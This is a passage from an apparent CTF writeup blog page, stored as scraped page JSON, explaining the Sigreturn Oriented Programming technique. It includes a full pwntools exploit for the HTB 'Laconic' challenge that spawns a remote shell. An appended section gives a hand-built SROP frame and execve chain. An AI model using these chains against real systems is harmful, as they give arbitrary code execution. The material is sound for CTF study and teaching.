3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About Sigreturn Oriented Programming(SROP)</h3>\n<p>SROP is a technique 
that abuses <code class=\"language-text\">sigreturn</code>, which is used after a signal handler finishes to restore the stack and registers to the state before the interrupt occurred.</p>\n<p>When <code class=\"language-text\">sigreturn</code> is called, it restores the state using information called a Sigframe, which stores the stack and register values.</p>\n<p>Therefore, by calling <code class=\"language-text\">sigreturn</code> after embedding a forged Sigframe containing the register values you want to overwrite, you can set the registers to arbitrary values.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 832px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/219090f2fa5467630191ca073afc470a/8ac56/image-20250328230608699.webp 240w,\n/static/219090f2fa5467630191ca073afc470a/d3be9/image-20250328230608699.webp 480w,\n/static/219090f2fa5467630191ca073afc470a/de44a/image-20250328230608699.webp 832w\"\n              sizes=\"(max-width: 832px) 100vw, 832px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/219090f2fa5467630191ca073afc470a/8ff5a/image-20250328230608699.png 240w,\n/static/219090f2fa5467630191ca073afc470a/e85cb/image-20250328230608699.png 480w,\n/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png 832w\"\n            
sizes=\"(max-width: 832px) 100vw, 832px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/219090f2fa5467630191ca073afc470a/ef6b9/image-20250328230608699.png\"\n            alt=\"image-20250328230608699\"\n            title=\"image-20250328230608699\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.aynakeya.com/articles/ctf/pwn-srop-power-of-sigreturn/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pwn - Sigreturn Oriented Programming (SROP) Technique | Aynakeya’s Blog</a></p>\n<p>A forged Sigframe can be created with Pwntools as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Srop</span>\nframe     <span class=\"token operator\">=</span> SigreturnFrame<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nframe<span class=\"token punctuation\">.</span>rax <span class=\"token operator\">=</span> <span class=\"token number\">0x3b</span>            <span class=\"token comment\"># syscall number for execve</span>\nframe<span class=\"token punctuation\">.</span>rdi <span class=\"token operator\">=</span> binsh           <span class=\"token comment\"># pointer to /bin/sh</span>\nframe<span class=\"token punctuation\">.</span>rsi <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rdx <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rip <span class=\"token operator\">=</span> rop<span 
class=\"token punctuation\">.</span>syscall<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span></code></pre></div>\n<p>Using this, I was able to obtain the Flag for this challenge with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token 
punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *0x43017\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./laconic\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    
<span class=\"token comment\"># target = process(TARGET_PATH)</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"83.136.253.184\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">51762</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nbinsh <span class=\"token operator\">=</span> <span class=\"token number\">0x43238</span>\nframe     <span class=\"token operator\">=</span> SigreturnFrame<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nframe<span class=\"token punctuation\">.</span>rax <span class=\"token operator\">=</span> <span class=\"token number\">0x3b</span>            <span class=\"token comment\"># syscall number for execve</span>\nframe<span class=\"token punctuation\">.</span>rdi <span class=\"token operator\">=</span> binsh           <span class=\"token comment\"># pointer to /bin/sh</span>\nframe<span class=\"token punctuation\">.</span>rsi <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rdx <span class=\"token operator\">=</span> <span class=\"token number\">0x0</span>             <span class=\"token comment\"># NULL</span>\nframe<span class=\"token punctuation\">.</span>rip <span class=\"token operator\">=</span> <span class=\"token number\">0x43015</span>         <span class=\"token comment\"># ROP syscall</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"\\x00\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    <span 
class=\"token number\">0x43018</span><span class=\"token punctuation\">,</span>    <span class=\"token comment\"># pop rax ; ret</span>\n    <span class=\"token number\">0xf</span><span class=\"token punctuation\">,</span>        <span class=\"token comment\"># rt_sigreturn</span>\n    <span class=\"token number\">0x43015</span><span class=\"token punctuation\">,</span>    <span class=\"token comment\"># ROP syscall</span>\n    frame       <span class=\"token comment\"># SigreturnFrame</span>\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>HTB’s CTF had many interesting and educational challenges.</p>\n<p>I still have not finished reviewing the Hard challenges, so I plan to do the upsolve in a separate 
article.</p>","fields":{"slug":"/ctf-cyber-apocalypse-2025-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2025-03-28","description":"Cyber Apocalypse CTF 2025 Writeup","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"Cyber Apocalypse CTF 2025 Writeup","socialImage":{"publicURL":"/static/0b5efa022bd86cd055fd0688f9e8e95a/ctf-cyber-apocalypse-2025.png"}}}},"pageContext":{"slug":"/ctf-cyber-apocalypse-2025-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}
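The Laconic chain above leans on pwntools' `SigreturnFrame` to lay out the 248-byte x86-64 `ucontext` that `rt_sigreturn` consumes. The following is an added example, not code from the original writeup, and it needs no pwntools: it packs that frame and the full chain by hand so the field offsets and the "frame must start at rsp when `syscall` runs" requirement are explicit. The gadget addresses (`0x43018` pop rax; ret, `0x43015` syscall, `0x43238` pointer to "/bin/sh") are taken from the writeup and assumed correct for that binary.

```python
"""
Hand-built x86-64 SROP frame and execve chain, mirroring what pwntools'
SigreturnFrame and flat() produced in the Laconic exploit. Added example;
gadget addresses are those quoted in the writeup (assumed correct).
"""
import struct


def p64(v: int) -> bytes:
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


# Field order of the x86-64 struct ucontext that sys_rt_sigreturn reads from
# the stack. This is the layout SigreturnFrame fills in; one qword per field.
SROP_FIELDS_AMD64 = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]
SROP_OFFSET = {name: 8 * i for i, name in enumerate(SROP_FIELDS_AMD64)}
SROP_FRAME_SIZE = 8 * len(SROP_FIELDS_AMD64)  # 248 bytes on amd64

SYS_RT_SIGRETURN = 0xf
SYS_EXECVE = 0x3b


def build_srop_frame(**regs: int) -> bytes:
    """Return a 248-byte ucontext with the given registers set.

    csgsfs defaults to 0x33 (user-mode cs selector), the same default
    pwntools uses; everything else not passed in is zero.
    """
    values = {name: 0 for name in SROP_FIELDS_AMD64}
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise ValueError(f"unknown frame field {name!r}")
        values[name] = val
    return b"".join(p64(values[name]) for name in SROP_FIELDS_AMD64)


def build_execve_chain(pop_rax_ret: int, syscall_ret: int, binsh: int,
                       pad: int = 8) -> bytes:
    """Assemble the chain used against Laconic:

        pad | pop rax; ret | 0xf | syscall | ucontext

    `pop rax; ret` loads rax=0xf and returns into the syscall gadget. At that
    moment rsp points at the ucontext, which is exactly what rt_sigreturn
    expects, so the kernel reloads every register from it and resumes at
    frame.rip with rax=execve, rdi=&"/bin/sh", rsi=rdx=0.
    """
    frame = build_srop_frame(rax=SYS_EXECVE, rdi=binsh, rsi=0, rdx=0,
                             rip=syscall_ret)
    return (b"\x00" * pad + p64(pop_rax_ret) + p64(SYS_RT_SIGRETURN)
            + p64(syscall_ret) + frame)


def frame_field(frame: bytes, name: str) -> int:
    """Read one register back out of a packed frame (sanity check helper)."""
    off = SROP_OFFSET[name]
    return struct.unpack("<Q", frame[off:off + 8])[0]


if __name__ == "__main__":
    chain = build_execve_chain(pop_rax_ret=0x43018, syscall_ret=0x43015,
                               binsh=0x43238)
    frame = chain[32:]  # 8 pad bytes + 3 chain qwords precede the frame
    for reg in ("rax", "rdi", "rsi", "rdx", "rip", "csgsfs"):
        print(f"{reg:>6} @ +{SROP_OFFSET[reg]:#05x} = {frame_field(frame, reg):#x}")
    print(f"total chain length: {len(chain)} bytes")
```

Two things worth checking before sending a chain like this: the frame must begin at the qword immediately after the syscall gadget address, because `rt_sigreturn` takes the ucontext from rsp with no extra padding; and since `rsp` in the frame is left at zero, `frame.rip` must point at code that never touches the stack before the process is replaced, which a bare `syscall` into `execve` satisfies.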
